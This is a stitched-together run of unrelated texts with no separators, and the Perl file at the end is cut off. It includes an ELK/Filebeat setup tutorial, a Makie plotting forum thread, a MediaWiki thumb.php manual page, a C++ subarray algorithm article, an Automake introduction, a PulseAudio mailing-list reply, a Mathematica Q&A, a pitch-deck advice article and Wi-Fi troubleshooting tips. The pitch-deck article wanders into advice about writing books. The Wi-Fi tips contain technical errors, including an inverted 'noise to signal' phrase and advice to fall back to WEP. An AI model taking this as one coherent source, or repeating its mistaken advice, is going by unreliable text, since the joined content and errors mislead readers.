wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add -
Download the Filebeat .deb package and install it with the dpkg command.
wget https://artifacts.elastic.co/downloads/beats/filebeat/filebeat-5.1.1-amd64.deb
dpkg -i filebeat-5.1.1-amd64.deb
Go to the filebeat configuration directory and edit the filebeat.yml file with vim.
cd /etc/filebeat/
vim filebeat.yml
Add the new log file paths in the paths configuration section.
paths:
- /var/log/auth.log
- /var/log/syslog
Add this configuration for the syslog document type on line 26.
document_type: syslog
Disable the elasticsearch output by commenting out the lines shown below.
#-------------------------- Elasticsearch output ------------------------------
#output.elasticsearch:
# Array of hosts to connect to.
# hosts: ["localhost:9200"]
Enable the logstash output: uncomment the configuration and change the values as shown below.
output.logstash:
# The Logstash hosts
hosts: ["192.168.1.97:5443"]
bulk_max_size: 1024
ssl.certificate_authorities: ["/etc/pki/tls/certs/logstash-forwarder.crt"]
template.name: "filebeat"
template.path: "filebeat.template.json"
template.overwrite: false
Save the file and exit the editor.
Enable Filebeat to start at boot and start the service.
sudo systemctl enable filebeat
sudo systemctl start filebeat
Check the filebeat service status.
systemctl status filebeat
Step 8 - Testing
Open your web browser and visit the elastic stack domain that you used in the Nginx configuration; mine is server.logging.com or 192.168.1.97.
Log in as the admin user with your password and press Enter to open the Kibana dashboard.
Create the new default index filebeat-* and click the Create button.
The default index has been created. If you have multiple beats on the elastic stack, you can set the default beat with a single click on the star button.
Open the 'Discover' menu and you will see all the log files from the elk-client1 and elk-client2 servers.
An example of the JSON output from the elk-client1 server log for a server reboot.
And there is much more we can do with the Kibana dashboard.
The ELK Stack has been installed on the CentOS 7 server, and Filebeat has been installed on the CentOS 7 and Ubuntu clients.
Reference: https://www.elastic.co/guide/index.html
Cover image: YouTube
Array of boxes using Makie and volume
Hi,
the examples from the Makie documentation show how to build a cube (using volume), but if I try to update the scene with a new one, they overlap. Any ideas on how to solve this. I want to create an array of cubes.
using Makie
r = LinRange(-4, 4, 100); # our value range, cube centered at 0
r1 = LinRange(5, 8, 100); # our value range, cube centered at 6
ρ(x, y, z) = exp(-(abs(0.1*x^2))) # function (charge density)
scene = Scene(backgroundcolor = :black)
volume!(
scene,
r, r, r, # coordinates to plot on
ρ, # charge density (functions as colorant)
algorithm = :mip # maximum-intensity-projection
)
volume!(
scene,
r1, r1, r1, # coordinates to plot on
ρ, # charge density (functions as colorant)
algorithm = :mip # maximum-intensity-projection
)
scene[Axis].names.textcolor = :white # let axis labels be seen on dark background
scene
Not Makie, but good for now.
using PlotlyJS
function cube_form(center = 0.0)
mesh3d(
x=[0, 0, 1, 1, 0, 0, 1, 1],
y=[0, 1, 1, 0, 0, 1, 1, 0] .+ center,
z=[0, 0, 0, 0, 1, 1, 1, 1],
i=[7, 0, 0, 0, 4, 4, 6, 6, 4, 0, 3, 2],
j=[3, 4, 1, 2, 5, 6, 5, 2, 0, 1, 6, 3],
k=[0, 7, 2, 3, 6, 7, 1, 1, 5, 5, 7, 6],
intensity=range(0, stop=1, length=8),
colorscale=[
[0, "gold"],
[0.5, "mediumturquoise"],
[1, "gold"]
],
showscale=false,
opacity = 0.5
)
end
t = cube_form()
t1 = cube_form(1.5)
t2 = cube_form(3.0)
plot([t, t1, t2])
In Makie you can do:
using Makie
function cube_form(center = 0.0)
# In theory mesh(cube) just works, but somehow doesn't play nicely with
# the colormap
cube = FRect3D(Vec3f0(0) .+ Vec3f0(0, center, 0), Vec3f0(1))
points = decompose(Point3f0, cube)
faces = decompose(GLTriangle, cube)
mesh!(
points, faces,
color = LinRange(0, 1, 8),
colormap = [
(:gold, 0.5),
(:mediumturquoise, 0.5),
(:gold, 0.5)
],
transparency = true
)
end
s = Scene()
t = cube_form()
t1 = cube_form(1.5)
t2 = cube_form(3.0)
s
I got the following error in julia 1.0.3 ?
UndefVarError: GLTriangle not defined
Stacktrace:
[1] cube_form(::Float64) at ./In[1]:8
[2] cube_form() at ./In[1]:6
[3] top-level scope at In[1]:21
Sorry, needs a using GeometryTypes
Now it works.
How did you change the angle of projection (view angle)? My output doesn’t look like yours.
Edit: Oh, the output in a Jupyter notebook is fixed. But running just the script pops out a window where rotation is possible.
You can have the same effect inside a notebook with:
AbstractPlotting.inline!(false)
Not working in my end. And no error is shown. Dead end here :smile:
Manual:thumb.php
From MediaWiki.org
Jump to: navigation, search
Other languages:
català • Deutsch • Ελληνικά • English • español • suomi • français • italiano • 日本語 • Bahasa Melayu • Nederlands • polski • português • português do Brasil • 中文
§Details[edit | edit source]
Script used to resize images if it is configured to be done when the web browser requests the image and not when generating the page.
To use it, set $wgThumbnailScriptPath to the path of this file.
Parameters are f for file name, w for width, p for page in multipaged files (if available).
Example: https://commons.wikimedia.org/w/thumb.php?f=Delle_strade_ferrate_e_della_loro_futura_influenza_in_Europa.djvu&w=600&p=206
§404 Handler[edit | edit source]
This script can also be used as a 404 handler to generate image thumbs when they don't exist. To use it, follow the steps below, then set $wgGenerateThumbnailOnParse to false. If you have $wgLocalFileRepo defined in LocalSettings.php, then you need to also set:
$wgLocalFileRepo['transformVia404'] = true;
§MediaWiki >= 1.20[edit | edit source]
Create a rewrite rule to call thumb_handler.php when a file in $wgUploadPath/thumb/ doesn't exist. If your wiki is in the /w directory, something like this should work on apache:
RewriteEngine on
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^/?w/images/thumb/[0-9a-f]/[0-9a-f][0-9a-f]/[^/]+/[^/]+$ /w/thumb_handler.php [L,QSA]
# If your $wgHashedUploadDirectory is false, remove the first two steps after thumb/
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^/?w/images/thumb/archive/[0-9a-f]/[0-9a-f][0-9a-f]/[^/]+/[^/]+$ /w/thumb_handler.php [L,QSA]
If this doesn't work, the 1.19 version should still work.
§MediaWiki <= 1.19[edit | edit source]
Create a rewrite rule to call this script when a file in $wgUploadPath/thumb/ doesn't exist. If your wiki is in the /wiki directory, something like this should work on apache:
RewriteEngine on
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^/?w/images/thumb/[0-9a-f]/[0-9a-f][0-9a-f]/([^/]+)/([0-9]+)px-.*$ /w/thumb.php?f=$1&width=$2 [L,QSA,B]
# If your $wgHashedUploadDirectory is false, remove the first two steps after thumb/
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^/?w/images/thumb/archive/[0-9a-f]/[0-9a-f][0-9a-f]/([^/]+)/([0-9]+)px-.*$ /w/thumb.php?f=$1&width=$2&archived=1 [L,QSA,B]
# If your $wgHashedUploadDirectory is false, remove the first two steps after thumb/archive/
Example: http://www.mediawiki.org/w/thumb.php?f=example.jpg&width=100
§Scripted transform[edit | edit source]
Just add the following code to the bottom of LocalSettings.php.
$wgThumbnailScriptPath = "{$wgScriptPath}/thumb{$wgScriptExtension}";
No apache config changes needed. This will cause thumb.php to either return the file if its already been rendered, or render the file on demand if needed.
See also
Smallest subarray from a given Array with sum greater than or equal to K
• Difficulty Level : Hard
• Last Updated : 28 Jul, 2020
Given an array A[] consisting of N integers and an integer K, the task is to find the length of the smallest subarray with sum greater than or equal to K. If no such subarray exists, print -1.
Examples:
Input: A[] = {2, -1, 2}, K = 3
Output: 3
Explanation:
Sum of the given array is 3.
Hence, the smallest possible subarray satisfying the required condition is the entire array.
Therefore, the length is 3.
Input: A[] = {2, 1, 1, -4, 3, 1, -1, 2}, K = 5
Output: 4
Naive Approach:
The simplest approach to solve the problem is to generate all possible subarrays of the given array and check which subarray sum is greater than or equal to K. Among all such subarrays satisfying the condition, print the subarray having minimum length.
Time Complexity: O(N^2)
Auxiliary Space: O(1)
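For reference, a brute-force sketch of this naive approach is shown below; it is an illustration only, not the article's reference implementation.
C++
// Brute-force sketch: for every starting index, extend the subarray
// until its sum reaches K and keep the shortest length found.
#include <bits/stdc++.h>
using namespace std;

int smallestSubarrayNaive(const vector<int>& a, int k)
{
    int n = a.size();
    int best = INT_MAX;
    for (int i = 0; i < n; i++) {
        long long sum = 0;
        for (int j = i; j < n; j++) {
            sum += a[j];
            if (sum >= k) {
                // The first j that reaches K gives the shortest
                // subarray starting at index i.
                best = min(best, j - i + 1);
                break;
            }
        }
    }
    return (best == INT_MAX) ? -1 : best;
}

int main()
{
    vector<int> a = { 2, 1, 1, -4, 3, 1, -1, 2 };
    cout << smallestSubarrayNaive(a, 5) << endl; // prints 4
    return 0;
}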
Efficient Approach:
The above approach can be further optimized using Prefix Sum Array and Binary search. Follow the steps below:
• Initialize an array to store the Prefix sum of the original array.
• Hash the prefix sum array with the indices using a Map.
• If a greater sum is already present at a smaller index, there is no point in hashing a prefix sum that is smaller than the largest prefix sum obtained so far. Therefore, hash prefix sums in increasing order.
• While traversing the array, if any single element is greater than or equal to K, return 1 as the answer.
• Otherwise, for every element, perform Binary Search over the indices (i, n-1) in the prefix sum array to find the first index with sum at least K.
• Return the minimum length subarray obtained from the above steps.
Below is the implementation of the above approach:
C++
// C++ Program to implement
// the above approach
#include <bits/stdc++.h>
using namespace std;
// Function to perform Binary Search
// and return the smallest index with
// sum greater than value
int binary_search(map<int, vector<int> >& m,
int value, int index)
{
// Search the value in map
auto it = m.lower_bound(value);
// If all keys in the map
// are less then value
if (it == m.end())
return 0;
// Check if the sum is found
// at a greater index
auto it1
= lower_bound(it->second.begin(),
it->second.end(), index);
if ((it1 - it->second.begin())
!= it->second.size())
return *it1;
return 0;
}
// Function to find the smallest subarray
// with sum greater than equal to K
int findSubarray(int arr[], int n, int k)
{
// Prefix sum array
int pre_array[n];
// Stores the hashes to prefix sum
map<int, vector<int> > m;
pre_array[0] = arr[0];
m[pre_array[0]].push_back(0);
// If any array element is
// greater than equal to k
if (arr[0] >= k)
return 1;
int ans = INT_MAX;
for (int i = 1; i < n; i++) {
pre_array[i]
= arr[i] + pre_array[i - 1];
// If prefix sum exceeds K
if (pre_array[i] >= k)
// Update size of subarray
ans = min(ans, i + 1);
auto it = m.rbegin();
// Hash prefix sum in
// increasing order
if (pre_array[i] >= it->first)
m[pre_array[i]].push_back(i);
}
for (int i = 1; i < n; i++) {
int temp
= binary_search(m,
pre_array[i - 1] + k,
i);
if (temp == 0)
continue;
// Update size of subarray
ans = min(ans, temp - i + 1);
}
// If any subarray is found
if (ans <= n)
return ans;
// If no such subarray exists
return -1;
}
// Driver Code
int main()
{
int arr[] = { 2, 1, 1, -4, 3, 1, -1, 2 };
int k = 5;
int n = sizeof(arr) / sizeof(arr[0]);
cout << findSubarray(arr, n, k) << endl;
return 0;
}
Output:
4
Time Complexity: O(NlogN)
Auxiliary Space: O(N)
1. Introduction
Automake is a tool for automatically generating `Makefile.in' files from `Makefile.am' files. Each `Makefile.am' file is essentially a collection of macros for the make program (sometimes with a few rules). The `Makefile.in' files produced this way conform to the GNU Makefile standards.
The GNU Makefile standard (see section `Makefile Conventions' in The GNU Coding Standards) is a long, intricate document, and its contents may change in the future. Automake was designed to take the burden of Makefile maintenance off the shoulders of the GNU project maintainer (and put it onto the shoulders of the Automake maintainer).
A typical Automake input file is simply a series of macro definitions. Each such file is processed to produce a `Makefile.in'. There should be only one `Makefile.am' file per project directory.
Automake imposes certain restrictions on a project; for example, it assumes that the project uses Autoconf (see section `Introduction' in the Autoconf manual), and it also places some restrictions on the contents of the `configure.in' file.
Automake requires perl in order to generate the `Makefile.in' files. However, a distribution created by Automake fully conforms to the GNU standards and does not require perl to build.
You can send suggestions and bug reports for Automake to [email protected].
This document was generated on February 19, 2004 using texi2html
View Problem
Find all Pythagorean triangles with length or height less than or equal to 20
Pythagorean triangles are right angle triangles whose sides comply with the following equation:
a * a + b * b = c * c
where c represents the length of the hypotenuse, and a and b represent the lengths of the other two sides. Find all such triangles where a, b and c are non-zero integers with a and b less than or equal to 20. Sort your results by the size of the hypotenuse. The expected answer is:
[3, 4, 5]
[6, 8, 10]
[5, 12, 13]
[9, 12, 15]
[8, 15, 17]
[12, 16, 20]
[15, 20, 25]
ruby
results=[]
1.upto(20) do |a|
1.upto(20) do |b|
c=Math.sqrt(a**2+b**2)
results<<[a, b, c.to_i] if c.to_i==c && !results.index([b, a, c.to_i])
end
end
results=results.sort_by{|r| r[2]}
puts results
ruby
def find_pythag( max=20 )
r = []
1.upto max do |n|
n.upto max do |m|
h = Math.sqrt( n**2 + m**2)
r << [n,m,h.to_i] if (h.round - h).zero?
end
end
r.sort_by { |a| a[2] }
end
erlang
find_all_pythagorean_triangles(L) ->
lists:sort(fun({_, _, H1}, {_, _, H2}) -> H1 =< H2 end,
[ { X, Y, Z } ||
X <- lists:seq(1,L),
Y <- lists:seq(1,L),
Z <- lists:seq(1,2*L),
X*X + Y*Y =:= Z*Z,
Y > X,
Z > Y
]).
main(_) ->
List = find_all_pythagorean_triangles(20).
[pulseaudio-discuss] Detecting when data source disappears?
Georg Chini georg at chini.tk
Fri May 19 06:05:08 UTC 2017
On 19.05.2017 06:02, Steven Wawryk wrote:
>
>
>>> I've been reading up and experimenting on both the simple and async
>>> APIs. In one experiment, I used a CLI file that sets up a set of
>>> module-sine modules with output remapped by module-remap-sink modules
>>> to a stream fed to a module-null-sink module.
Could you please include the command sequence you are using? Maybe I can
reproduce the problem here.
>>>
>>> I then wrote 2 programs, one using the simple API and the other the
>>> async API to read date from the module-null-sink monitor source and
>>> write the data to file (both based on examples to provide "parec"
>>> functionality). Then I could unload either all the module-sine
>>> modules or all the module-remap-sink modules to interrupt the data
>>> source to the module-null-sink module.
>>>
>>> Both programs gave the same result, which I don't completely
>>> understand.
>>>
>>> The issues I've found are:
>>>
>>> 1. After the data source is gone, the program continues to write data
>>> to file. There doesn't seem to be any way to detect a stream of
>>> "zero" data using the APIs.
>> That is expected behavior. null-sink.monitor is not different from other
>> sources, which means
>> if there is no input to the null-sink, it will generate silence. It's
>> like recording from an unplugged
>> mic or line-in input.
> And there's no silence detection?
No, there isn't. This would have to be implemented on application level.
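For illustration only (this sketch is not from the thread or from PulseAudio itself, and assumes S16LE samples), an application-level silence check could simply scan each buffer it reads from the stream:
#include <stddef.h>
#include <stdint.h>
/* Returns 1 if every 16-bit sample in the buffer is zero. */
static int buffer_is_silent(const void *data, size_t nbytes)
{
    const int16_t *samples = (const int16_t *) data;
    size_t n = nbytes / sizeof(int16_t);
    for (size_t i = 0; i < n; i++)
        if (samples[i] != 0)
            return 0;
    return 1;
}
Calling this on the data returned by pa_simple_read(), or inside the read callback of the async API, would let the program stop writing to file once it has seen only silence for some chosen amount of time.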
>>> 2. If I run it for 20 seconds, with 10 seconds of sinusoidal data
>>> followed by 10 seconds of null data, the file ends up with anything
>>> from 30 to 40 seconds worth of data in it.
>>>
>>> 3. The files written from case 2, above, show the initial sinusoidal
>>> data as expected, but then, following data stream interruption, about
>>> 5 to 10 seconds of switching back and forth between segments of
>>> sinusoidal data and null data, before finally settling to null data
>>> only till the end of file.
>> Did you test if the same happens with parec? If yes, are there any log
>> messages
>> during the time?
> Just did it and the result is the same. Attached is the relevant part
> of the syslog.
This looks like a bug but the log is not verbose enough. The best way to
get more
information is to run pulseaudio with debugging enabled. You might need
to disable
autospawn in client.conf or stop the user service when using systemd
before you
can do so. Then run pulseaudio -vvvv from the command line.
How can I clear a subset of a symbol's DownValues ?
For example, suppose I have created some DownValues for $f$ like this:
(f[Sequence @@ #] = Plus @@ #) & /@ Subsets[{1, 2, 3}];
f[x_, y_] := x y
DownValues[f]
(* {HoldPattern[f[]] :> 0, HoldPattern[f[1]] :> 1,
HoldPattern[f[2]] :> 2, HoldPattern[f[3]] :> 3,
HoldPattern[f[1, 2]] :> 3, HoldPattern[f[1, 3]] :> 4,
HoldPattern[f[2, 3]] :> 5, HoldPattern[f[1, 2, 3]] :> 6,
HoldPattern[f[x_, y_]] :> x y} *)
I now wish to clear all the downvalues for which $f$ has exactly $n$ numerical arguments. In other words I would like to have a function selectiveClear[f,n] such that this would happen:
selectiveClear[f,2]
DownValues[f]
(* {HoldPattern[f[]] :> 0, HoldPattern[f[1]] :> 1,
HoldPattern[f[2]] :> 2, HoldPattern[f[3]] :> 3,
HoldPattern[f[1, 2, 3]] :> 6, HoldPattern[f[x_, y_]] :> x y} *)
I have tried using Cases to pick a subset of the DownValues, but I can't seem to get the pattern correct.
Related: stackoverflow.com/q/5086749/618728 – Mr.Wizard Jul 6 '12 at 11:30
@Mr.Wizard, the link is very useful too, thanks. I always forget to search on stackoverflow. It would be nice if the Mathematica questions on there could be imported into this site somehow. – Simon Woods Jul 6 '12 at 13:09
They can be imported, but only on a case-by-case basis as they're still generally on-topic over there. We have to beg and plead for them to be migrated, and it rarely happens with questions that are older with good answers already. – rcollyer Jul 6 '12 at 14:36
1 Answer
DownValues[f] =
DeleteCases[DownValues[f], _@_[_?NumericQ, _?NumericQ] :> _]
{HoldPattern[f[]] :> 0, HoldPattern[f[1]] :> 1,
HoldPattern[f[2]] :> 2, HoldPattern[f[3]] :> 3,
HoldPattern[f[1, 2, 3]] :> 6, HoldPattern[f[x_, y_]] :> x y}
It is possible to make this pattern fail if you want also to clear something like:
f[1, 2] /; $op := "$op is active"
This would catch it:
DeleteCases[
DownValues[f],
(x_ :> _) /; ! x ~FreeQ~ Verbatim[f][_?NumericQ, _?NumericQ]
]
Szabolcs remarks it is valuable to mention Unset in this context.
I described the use of that and related functions here.
Thanks, this is just what I needed. I've used Repeated[_?NumericQ,{n}] to get a function that removes downvalues with n arguments. – Simon Woods Jul 6 '12 at 13:07
@Simon glad I could help. That is a good generalization. – Mr.Wizard Jul 6 '12 at 13:13
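A minimal sketch of that generalization (my own illustration based on the comment above, not code from either poster) could be:
SetAttributes[selectiveClear, HoldFirst];
selectiveClear[f_Symbol, n_Integer] := (
  DownValues[f] =
   DeleteCases[DownValues[f],
    _@_[Repeated[_?NumericQ, {n}]] :> _]
  )
With the definitions from the question, selectiveClear[f, 2] then removes exactly the rules with two numerical arguments, leaving the general f[x_, y_] definition in place.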
Pitchgrade
Presentations made painless
Usability Testing Report Pitch Deck Template
Jan 12, 2023
This article provides a comprehensive guide to creating a usability testing report pitch deck template. Usability testing is a process of testing how users interact with a website or application, and is a key part of the development process for any website or product. By creating and using a usability testing report pitch deck template, teams can quickly and accurately track user experience data and make informed decisions about the user experience. This article will explain the key components of a usability testing report pitch deck template and provide step-by-step instructions for creating one.
1. Introduction
• Overview of Usability Testing
• Benefits of Usability Testing
• What We'll Cover
2. The Usability Testing Process
• Goals & Objectives
• Target Audience
• Tools
• Test Participants
• Test Scenarios
• Results & Analysis
3. Our Usability Testing Results
• Summary
• Findings & Recommendations
• User Behaviors
• Metrics
4. Conclusion
• Impact of Usability Testing
• Next Steps
• Questions & Answers
Tips for Creating a Great Usability Testing Report Pitch Deck
Start by creating a template that outlines the goals, objectives, and key deliverables of the usability testing report.
When you create a template, keep it simple and clear. You can use a template like a checklist to ensure that you cover all the necessary parts of the usability testing report. However, remember to leave enough room for you to add your own observations and comments. The template is meant to be a guideline, rather than an instruction manual.
Include visuals, such as graphs and charts, to illustrate the report's findings.
Including visuals, such as photographs, graphs, charts, and infographics can help to engage the reader. Make sure that the visuals you choose are relevant to the report and that they accurately convey the information that you are trying to convey.
Including visuals can also help to break up the text, making the report easier to read. Additionally, visuals can help to illustrate the report's findings, conveying information more effectively than text alone.
Make sure the template is organized into logical sections and subsections.
Having a template is a great way to ensure that you follow a logical process in writing a book, however, to make sure you're not caught off guard, you should also keep a list of topics that need to be included in your book. Additionally, you should have a list of sources you will use to support the claims you make.
Reading lists or bibliographies are common in academic or scholarly texts; however, you can also include a list of resources in other types of books. Consider keeping a list of the names of the people you will interview for the book. This will help you to track down people to interview and to ensure that you interview the right people for the book. You can also keep track of potential images or other media that you can use in your book to help make your points.
By keeping lists of topics, sources, and images, you can ensure that you include everything that is necessary for your book.
Identify and highlight the most important findings and results.
When presenting your data, it is essential to include an explanation of your findings. This will help to ensure that your audience understands the data and can draw their own conclusions.
Utilize a consistent visual language and design elements throughout the pitch deck.
Consistency is key in creating a sense of uniformity in your presentation. For example, using the same font throughout your pitch deck makes it easier for investors to read and understand your presentation. It also makes your presentation look more professional and polished.
Another benefit of consistency is that it sets the stage for your story. Investors want to know who you are and what you're all about. The consistency of your visual language helps them get to know you faster and understand your mission and vision.
Make sure to include a slide summarizing the key takeaways and recommendations.
The best way to summarize key takeaways and recommendations is to create a summary slide that includes bullet points that summarize the key takeaways and recommendations. This will allow the audience to quickly access the key takeaways and recommendations without having to listen to the entire presentation.
Frequently Asked Questions
How can I create a Usability Testing Report pitch deck?
A usability testing report pitch deck can be a great way to get ahead of the curve. A usability test is a simple way to find out how easy your product or service is to use. It's a great way to get feedback from your target audience and improve your product or service to make it more accessible for a wider audience.
The way to make a usability testing report appealing is to show how you will use the results of your test. So, include results from past usability tests that show how the information you gathered led to an improved product. This will make it easy for your audience to understand how usability testing can improve your business.
What are the most important aspects of Usability Testing Report pitch deck?
You're going to have to have a specific methodology for usability testing. You'll need to show how you'll go about performing the tests, including a process for recruiting participants, and a process for analyzing the data. If you already have a process in place, highlight that. If you're still working on a process, be sure to include that.
Why is it important that you create a Usability Testing Report pitch deck?
Designing a Usability Testing Report pitch deck is essential because when you're pitching to a client, you want to make sure that you're not just selling yourself and your service, but that you're selling the value of your work too. Your work should be able to speak for itself, but it's always good to have something concrete to show your client as well.
Who benefits from creating a Usability Testing Report pitch deck?
In my experience, the key to creating a Usability Testing Report pitch deck is to have a clear goal in mind. If your goal is to simply sell more software to your existing customers, then you will want to highlight how your software solves a pain point for your customers. If your goal is to acquire new customers, then you will want to highlight how your software can enable customers to achieve something they couldn't do before. In either case, you should focus on how your product will benefit your customers and how it will help them achieve their goals.
What are some extra considerations for improving my Usability Testing Report pitch deck?
Consider showing some of your testing data. This will help your audience understand user behavior and make it more likely that they'll agree with your testing findings. You should have a variety of data to share, so you can address every possible objection they might have.
For example, if they say, Our product is fine the way it is, you can show them data that shows your product isn't usable. If they say, Our product is fine the way it is, and it isn't worth the money to fix it, you can show them data that shows how much money can be saved by making the changes.
What are some resources for creating a Usability Testing Report pitch deck?
It can be difficult to know where to start when creating a usability report for a client. If you're feeling a little overwhelmed or are unsure of what exactly to include, I highly recommend using some of the great resources out there. One of my favourite resources is the Usability Testing Report Template from Usability.gov. This document provides a framework for you to work from and will provide a great starting point for your pitch deck. You can also check out other resources that can help you, such as this Usability Report Template from UXmatters.
What are some tips for creating a Usability Testing Report pitch deck?
Pitching deck creation is a process that requires you to use data to tell a story. The story is supported by data that gives the deck credibility. But there is more to it than just the data.
The data should be presented in a way that is easily understandable. The presentation should be as simple as possible. The data can be presented in the form of charts, graphs, and other visuals.
Simple charts are easy to understand and interpret. However, they must be used correctly to communicate the right message.
How can I make sure my Usability Testing Report pitch deck is successful?
The most important thing to remember is to be honest with the feedback. People who are giving you the feedback are doing so because they are interested in your product or service. They have put their time and effort into it, so they want to see your product succeed.
Be honest with them when you receive the feedback, and show that you are working on implementing their suggestions.
What are some common mistakes people make when creating a Usability Testing Report pitch deck?
When presenting usability testing results, avoid short-term and immediate implications and focus on the long-term changes and strategies. For example, if the results indicate that users are struggling to find a specific button, it may seem like an immediate fix to add a tooltip explaining where the button is. However, this may not be the correct choice, as it may lead to users missing out on other processes or features. A long-term solution may be to reposition the button in a more visible and accessible area on the interface.
How can I avoid making mistakes when creating a Usability Testing Report pitch deck?
Don't leave out the key details of the report. Don't assume that the people reading the pitch deck are familiar with usability testing. Make sure to include important details about the test participants and the testing process. Also include details about the types of problems that were identified and how the product will be improved based on the results of the testing.
What are some things I should keep in mind when creating a Usability Testing Report pitch deck?
When you are pitching a usability testing project, focus on the advantages and improvements that you can offer the client. While you may be pitching a project, the client is also looking for a solution to their usability issues. Convince them that you are the right person to help them.
Show them the value of your services as a usability testing expert. Talk about your previous experience and any case studies that you can share. Highlight your expertise and why you are the best person for the job.
Is there anything else I should know about creating a Usability Testing Report pitch deck?
You should always show the full journey your potential client wants to get to, and not just one part of it. Always present your findings in a way that shows you have a complete understanding of the client's needs, and can provide a full service to address them.
Problems with Wi-Fi
Although several improvements have been made recently to Internet speed and Wi-Fi, you may still encounter slow internet speeds and connection problems with Wi-Fi. This is because Wi-Fi operates in unregulated portions of the radio spectrum, and a Wi-Fi network currently behaves like “a weak radio station in a busy city market” when trying to tune in. To efficiently tune in and get online, here are a few pointers to help solve those Wi-Fi problems:
1. Try Rebooting the Routers
This may be the simplest solution to your Wi-Fi issues. Just try unplugging the power cord, waiting a few seconds, and then reconnecting it. If there are multiple routers or wireless access points (WAPs), reboot them all. Consumer or cheap Wi-Fi gear may need to be rebooted every few weeks to keep it working effectively. You can also turn the Wi-Fi off and on again on the computer, as this forces the system to rescan for available networks.
2. You Can Also Change the Location of The Routers and Computers
Moving the router or computer even a few meters can make a big difference. Try a higher and more central location. Keep the router away from large metal surfaces, as these act as energy sinks and obstruct Wi-Fi signals. Also keep the router away from mirrors and other reflective surfaces, as these affect Wi-Fi signals too.
3. Watch for Overheating
It is important that the vents of the router are not blocked by any other equipment placed on top of it. The router's enclosure is often poorly ventilated to begin with, and blocking these vents may result in strange behavior from the router.
4. Updating the Firmware
Firmware updates are often done to improve performance. You should always check if the firmware is up to date if you run into problems. You can also apply available patches especially when using new devices. But be warned! Firmware updates may introduce bugs into the system, so only update the firmware when you run into problems.
5. Use A Larger or External Antenna
Wi-Fi antennas are typically a few centimeters long on the router and internal on your device. If you are having problems with reception, you can always use a larger or external antenna. Some routers may offer removable antennas which should be easy to buy and replace. An external antenna can help to boost the noise to signal on a desktop or laptop with a metal case. You can also create a parabolic dish antenna by using a vegetable strainer and work accessories.
6. Forget Previously Saved Networks
Sometimes computers and mobile devices may run into problems even if they are connected to previous networks. The password may be the same but network hardware or encryption methods may change. The best way to resolve this matter is to let your device forget a previously saved network. It acts as a sort of refresh for your device. Once this is done, if you need to reconnect, you most definitely can!
7. Change the Wi-Fi channel
Getting a clean signal may be a problem, especially if you live in quite a populated area, as many devices use both the 2.4 GHz and 5.8 GHz bands. You can try changing the broadcast channel of the router. You can also run your router in automatic mode, which will assign a clear channel for you. If you are still encountering problems, try using a Wi-Fi monitor so that you can see which channels are in use and choose a channel that is much less crowded.
Try changing the encryption method. Some of these methods are WEP, WPA, and WPA2. Your password encrypts transmitted traffic, so you can switch the encryption method and see what works best. Try using WPA, as it is a huge improvement over WEP. WPA encryption may not be supported by older 802.11b equipment; in that case, stick to WEP.
root/trunk/omnipitr/lib/OmniPITR/Program/Backup/Master.pm
Revision 143, 20.7 kB (checked in by depesz, 8 years ago)
developer docs
1 package OmniPITR::Program::Backup::Master;
2 use strict;
3 use warnings;
4
5 use base qw( OmniPITR::Program );
6
7 use Carp;
8 use OmniPITR::Tools qw( :all );
9 use English qw( -no_match_vars );
10 use File::Basename;
11 use Sys::Hostname;
12 use POSIX qw( strftime );
13 use File::Spec;
14 use File::Path qw( mkpath rmtree );
15 use File::Copy;
16 use Storable;
17 use Cwd;
18 use Getopt::Long qw( :config no_ignore_case );
19
20 =head1 run()
21
22 Main function wrapping all work.
23
24 Starts with getting list of compressions that have to be done, then it chooses where to compress to (important if we have remote-only destination), then it makes actual backup, and delivers to all
25 destinations.
26
27 =cut
28
29 sub run {
30 my $self = shift;
31 $self->get_list_of_all_necessary_compressions();
32 $self->choose_base_local_destinations();
33
34 $self->start_pg_backup();
35 $self->compress_pgdata();
36
37 $self->stop_pg_backup();
38 $self->compress_xlogs();
39
40 $self->deliver_to_all_destinations();
41
42 $self->log->log( 'All done%s.', $self->{ 'had_errors' } ? ' with errors' : '' );
43 exit( 1 ) if $self->{ 'had_errors' };
44
45 return;
46 }
47
48 =head1 deliver_to_all_destinations()
49
50 Simple wrapper to have single point to call to deliver backups to all requested backups.
51
52 =cut
53
54 sub deliver_to_all_destinations {
55 my $self = shift;
56
57 $self->deliver_to_all_local_destinations();
58
59 $self->deliver_to_all_remote_destinations();
60
61 return;
62 }
63
64 =head1 deliver_to_all_local_destinations()
65
66 Copies backups to all local destinations which are not also base destinations for their respective compressions.
67
68 =cut
69
70 sub deliver_to_all_local_destinations {
71 my $self = shift;
72 return unless $self->{ 'destination' }->{ 'local' };
73 for my $dst ( @{ $self->{ 'destination' }->{ 'local' } } ) {
74 next if $dst->{ 'path' } eq $self->{ 'base' }->{ $dst->{ 'compression' } };
75
76 my $B = $self->{ 'base' }->{ $dst->{ 'compression' } };
77
78 for my $type ( qw( data xlog ) ) {
79
80 my $filename = $self->get_archive_filename( $type, $dst->{ 'compression' } );
81 my $source_filename = File::Spec->catfile( $B, $filename );
82 my $destination_filename = File::Spec->catfile( $dst->{ 'path' }, $filename );
83
84 my $time_msg = sprintf 'Copying %s to %s', $source_filename, $destination_filename;
85 $self->log->time_start( $time_msg ) if $self->verbose;
86
87 my $rc = copy( $source_filename, $destination_filename );
88
89 $self->log->time_finish( $time_msg ) if $self->verbose;
90
91 unless ( $rc ) {
92 $self->log->error( 'Cannot copy %s to %s : %s', $source_filename, $destination_filename, $OS_ERROR );
93 $self->{ 'had_errors' } = 1;
94 }
95
96 }
97 }
98 return;
99 }
100
101 =head1 deliver_to_all_remote_destinations()
102
103 Delivers backups to remote destinations using rsync program.
104
105 =cut
106
107 sub deliver_to_all_remote_destinations {
108 my $self = shift;
109 return unless $self->{ 'destination' }->{ 'remote' };
110 for my $dst ( @{ $self->{ 'destination' }->{ 'remote' } } ) {
111
112 my $B = $self->{ 'base' }->{ $dst->{ 'compression' } };
113
114 for my $type ( qw( data xlog ) ) {
115
116 my $filename = $self->get_archive_filename( $type, $dst->{ 'compression' } );
117 my $source_filename = File::Spec->catfile( $B, $filename );
